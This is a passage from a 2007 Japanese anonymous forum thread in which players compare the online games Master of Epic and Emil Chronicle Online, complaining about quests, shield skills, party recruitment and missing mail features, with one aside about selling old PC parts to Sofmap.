103 :ヽ(`Д´)ノ ウワァァァン:2007/02/15(木) 14:44:06.06 ID:++OKTTbd
みんなー、壊れたPCやマザボード、その他PCパーツはSofmapが0円で買い取ってくれるみたいよ
今日、買取査定いって来て聞いてみたら「業者に頼むとお金がかかるけど、Sofmapなら最低金額0円での買い取りになる」といわれますた^^

車や手で持っていける程度の量なら処分してくれるみたい。
だから使わなくなったパーツやゴミパーツは早めにSofmap買取センターに持って行ったほうがいいよ

9年ぐらい前のMacのATIグラフィックスPCIカードが、1400円で買い取ってくれたってのも驚き
PC100の128MBメモリは100円だったけど、PC133の256MBメモリ(両側にチップがついてるやつ)は1000円だった
ゴミみたいな価格でも全部で8000円分超えたので、タダで処分するならSofmapいけよ〜


104 :ヽ(`Д´)ノ ウワァァァン:2007/02/17(土) 11:26:21.44 ID:jy/sFLbo
MoEは木槌を持ったエゼイジアの強地震でプレイヤーが
ごろんごろん転がったり、ドロップキックで敵プレイヤーが
丸太ん棒みたいに飛んだり、普通に考えつきそうなことを
普通に入れてるよな。
今あるものを深くしてくってことを省くなよ

105 :ヽ(`Д´)ノ ウワァァァン:2007/02/17(土) 13:18:29.57 ID:8smlfUSD
夜になると現れる幽霊の村(ちゃちなテント村)の雰囲気や
夜になると一目散に巣穴に帰ってくダメネズミ達とかいいよね

ECOユーザーの妄想がチョンゲー臭いものばっかりかと言うと
そうでもない。それはEQUで、それはWoWが、みたいなのもある。
生産が無くてもいい、昼夜天候がなくてもいい、こんなの
ユーザーを舐めてるとしか思えない。
萌えキャラゲーの小さな成功に甘んじて、いいMMOを作ってやるんだ
という姿勢や良心がECOの開発から感じられないんだ。

106 :ヽ(`Д´)ノ ウワァァァン:2007/02/17(土) 14:09:43.82 ID:fXOTiiWq
ないものを感じられないのは
常識的に考えて正常

107 :ヽ(`Д´)ノ ウワァァァン:2007/02/27(火) 00:02:02.83 ID:HXyhTjn7
MoEは盾スキルが面白いんだけどこれも問題あったな。

※初心者への説明がないから初心者はなかなか使いこなせない。
防御の醍醐味というかMoEの戦闘の楽しさが伝わらない。

※せっかくの防御なのにゆくゆくは盾スキルを切る人が多い。
盾スキルが防御の集大成でいいんだけど剣で敵の攻撃を払うとか
とっさに丸太を出して変わり身の術のように使うとか
防御系のコマンド・テクニックは剣だろうが弓だろうが
一つは入れて欲しかった。ディレイ共通にでもして
盾スキルのように連続して防御できないとか工夫は
できたのに。あと魔法側の盾スキルに相当するものも
欲しかった。


108 :ヽ(`Д´)ノ ウワァァァン:2007/03/06(火) 04:27:26.32 ID:asznRBWR
ベルアイルのクライアントを消さずに残しておいたから
無料になったんで久しぶりにログインしてみた。
安っぽい作りだなあ。この安っぽいって感覚が
わからないようだと反吐六には未来ないね。

109 :ヽ(`Д´)ノ ウワァァァン:2007/03/07(水) 13:01:55.23 ID:OVi0N/1m
MoEはキャラの成長のシステムなんかは恐らく国産、洋ゲーを
含めても天下一品だと思うんだ。MoEと同じスキル制を採用すれば
まず文句がでないくらい優秀。でもソロゲーなんだ

110 :ヽ(`Д´)ノ ウワァァァン:2007/03/09(金) 23:47:18.35 ID:+gK8uu0u
ECOは着せ替えげーだろ?
http://lear.tm.land.to/ecoss/src/1172403081819.jpg

111 :ヽ(`Д´)ノ ウワァァァン:2007/03/11(日) 23:41:58.36 ID:KafLjh5L
MoEはクエストが弱かったな。ECOだと最初は酒場の
クエをこなしてから職業クエを受ける。
MoEは最初のクエストがない。狩りをして肉を焼く
以外にも釣りしたりイビルダンサーを見に行ったり
ジュースを作らせたり盾の使い方なんてのも
クエストで教えてやれるのにな。
ソロのほうも1人でやってもいいけど大勢でやれば
報酬もたくさんなクエストも作れたのにね。

112 :ヽ(`Д´)ノ ウワァァァン:2007/03/12(月) 17:42:38.50 ID:CceLKkZX
ネトゲでのクエスト追加は延命措置でしかないぞ
クエストは流石にずっと続けてると飽きる
無料ゲームで腐るほどあるからな

アクション性が無さ杉。操作キャラが山登ったり、川を泳いだり、崖に梯子かけて降りたりするのはFPSゲーでは常識
MMOでもそれを取り入れなければ誰もが飽きる

113 :ヽ(`Д´)ノ ウワァァァン:2007/03/12(月) 23:49:14.20 ID:3KJJeTLz
>>112
>WoWに用意されているクエストの数は膨大で,「今のレベルに
>適正な難度のクエストを,やり尽くしてしまった」なんてことには,
>まずならない。

こういう状況があるこそなんだろうけど
>WoWでは,1か所に陣取って,次々と湧き出す敵を倒し
>続けるようなレベリングは,まずない。WoWプレイヤーの
>意識としては,経験値は「敵を倒して稼ぐもの」というより,
>「クエストをこなして稼ぐもの」である。

MoEのやってもやらなくてもどうでもいいクエストなら
豊富にしておいて損はないんじゃないか?

114 :ヽ(`Д´)ノ ウワァァァン:2007/03/12(月) 23:52:57.43 ID:3KJJeTLz
やってもやらなくてもいいクエストばかりじゃないか。
ギルドのランクアップクエストやシップ装備クエスト、
アイテム枠拡張クエスト。これもNPCにゲーム内マネーを
払えばやってあげますなんてのよりはクエストで楽しませた
ほうがイイと思うな

115 :ヽ(`Д´)ノ ウワァァァン:2007/03/13(火) 02:34:05.35 ID:dBRmUZLZ
2chを拠点とする信者が痛すぎたゲームと言う印象しか無いな
後はハドソン開発が無能だった

116 :ヽ(`Д´)ノ ウワァァァン:2007/03/13(火) 11:20:06.27 ID:+xsq4eLo
>>115
MoEになってだいぶ大人しくなった>信者

117 :ヽ(`Д´)ノ ウワァァァン:2007/03/14(水) 05:02:36.96 ID:TW1wY7Q3
>>112
MMO全体でこんなの当たり前だろって流れになるといいな
http://up.moe.to/up/img/moeup204.jpg
ttp://moe.unofficial.jp/up/dat/18213.png
ttp://moe.unofficial.jp/up/dat/19123.jpg
ttp://moe.unofficial.jp/up/dat/18652.jpg

118 :ヽ(`Д´)ノ ウワァァァン:2007/03/14(水) 10:22:06.36 ID:t7Xm4BSO
いつも癌砲をご利用いただきありがとうございます。
先日の要望の件ですが、

操作キャラが山を登ったり → 鉄火山があります 
川を泳いだり         → 川に入るとBANします
崖に椅子掛けて降りたり  → MAP不正移動はBANの対象です

今後ともエミルクロニクルオンラインをよろしくお願いいたします。
                              癌砲開発チーム

119 :ヽ(`Д´)ノ ウワァァァン:2007/03/16(金) 07:18:40.68 ID:sgNJ8hEA
ECOのcβ参加と同時にMoEはやめたけど(盆踊りには出た)水中をはじめとした立体的な
戦闘が楽しかったな。
飽きたり嫌いになってやめたわけじゃないがMoEの独特なシステムは掛け持ちするには
不器用な俺にはちとつらい。一月も離れてたら全然動けなくなってたよ。
現役時は美味しくいただいてたmobにぼこられたw



120 :ヽ(`Д´)ノ ウワァァァン:2007/03/17(土) 12:41:29.02 ID:1c+oae4k
MoEを始めて3日目くらいにwikiの地図を見てレクスから
エルガディン王国というところまで走ってみようと思った。
1度目は尼砦近くに迷い込んで落下死、2度目は
地図を頭に叩き込んでドワーフ村まで行けた。
そこから先に進むのが面倒になって、たまねぎ畑を
掘ってる人に収穫について尋ねたりした後でわざと
死んで帰ってきた。

次の日はアルビーズ→ガルム回廊→イプス→ミーリムと
色々なのに追いかけられながら走ってみた。

予備知識なしで夜間キャンプやイビルダンサーやエルグの
亡霊を見つけたりシャリッサに追いかけられたりもした。
無茶な冒険してたようだけど実際はミーリム海岸に
1ヶ月くらいいてウンザリしてたよ。誰もPTに誘ってくれないし、
面白いクエストもないし、金もたまらないし、剣は当たらない。

アニメ化で増えた人も減ってるんじゃないか?

121 :ヽ(`Д´)ノ ウワァァァン:2007/03/21(水) 16:18:26.98 ID:9iZ84frw
ビスク中央アルターあたりでプレイヤーが鈴なりに
なって募集してるとかだと良かったね
5人バハ、4人ナジャみたいなPT必須は勘弁だけど
「コボルトの包帯集め募集中」とか「グリホンの肉&羽集め
募集中」、「尼巣殲滅PT募集中」とか
最近のネトゲは街が静かすぎて面白くない

122 :ヽ(`Д´)ノ ウワァァァン:2007/03/21(水) 17:12:14.13 ID:QK54sWeh
もうアニメおわるから後押しもないMOE,着せ替えしかやることないECO
融合すリャこの先生きのこれるはずだ。


123 :ヽ(`Д´)ノ ウワァァァン:2007/03/21(水) 22:38:35.88 ID:dSFs/PGI
やっぱりお前らきのこ好きなんだな

124 :ヽ(`Д´)ノ ウワァァァン:2007/03/26(月) 17:42:04.67 ID:TEclEhWS
イヴァリースアライアンス第2弾!
名作「FFT」が新ジョブや新規ムービーなど追加要素満載でPSPで登場。
【タイトル】 ファイナルファンタジータクティクス 獅子戦争

その追加要素の一部を掲載
アグリアス追加イベント
ttp://www.uploda.org/uporg747970.jpg


125 :ヽ(`Д´)ノ ウワァァァン:2007/04/08(日) 17:56:22.84 ID:TxZZCzw5
>>121
募集チャンネル、募集コメント、募集掲示板、
こういうパーティ募集システムがないのはおかしいって
人もいるようだけどまず人を誘って行きたくなるような
クエストやモンスターやダンジョンを考えないとな。
募集システムだけあっても意味ないよ。

126 :ヽ(`Д´)ノ ウワァァァン:2007/05/17(木) 14:23:02.63 ID:Ol/Kkhe+
売買用のAUCとは別に募集用のチャットがあれば解決!
チャンネルはいささか閉鎖的過ぎだな

127 :ヽ(`Д´)ノ ウワァァァン:2007/05/17(木) 14:24:44.45 ID:Ol/Kkhe+
募集システムより前に募集したくなるクエストとかが
必要なのは変わらないか

128 :ヽ(`Д´)ノ ウワァァァン:2007/05/18(金) 22:48:15.16 ID:/E0d1PSa
チャンネルはPT人数以上が集まったとき、
複数のPTで行くときなんか便利なんだがな。
でも募集をchでやるのはいけてないよね。


129 :ヽ(`Д´)ノ ウワァァァン:2007/05/20(日) 17:03:37.27 ID:/g/yH8Q7


130 :ヽ(`Д´)ノ ウワァァァン:2007/06/11(月) 04:20:39.77 ID:nC4mCnVX
なんだこの当選スレは

131 :ヽ(`Д´)ノ ウワァァァン:2007/06/12(火) 13:12:09.38 ID:xpr1HBvF
当選はMoEをまったくしらんよ

132 :ヽ(`Д´)ノ ウワァァァン:2007/06/12(火) 15:08:21.75 ID:f7by+EMb
>>130
チャットはもっちーの手で整理した経緯があるし
街が静かだ発言から察するとchも考えるところは
あったと思う。つうか当たり前の批判でも当選扱いは
>>115の通り変わってねえな

133 :ヽ(`Д´)ノ ウワァァァン:2007/06/12(火) 16:27:30.16 ID:xpr1HBvF
信者はアンチと同じ立ち位置だろうが

手紙機能、メール機能がないのは不便だった。
ログインしてない知り合いにメッセージを送りたいことだってある。
勝手にフレンドリストに入れることができたり/who allで個人の所在が
確認できたりフレンドシップに入ったりするとプライバシーがアレなのも
こなれてなかった。

134 :ヽ(`Д´)ノ ウワァァァン:2007/06/13(水) 19:19:05.22 ID:4herJtvq
小さな不満はないわけじゃないけどゲーム性は概ね良好。
やっぱり廃人ゲーになりようがないオーソドックスなスキル制
なのが大きい

135 :ヽ(`Д´)ノ ウワァァァン:2007/06/17(日) 01:27:02.19 ID:xfkgKvG1
 

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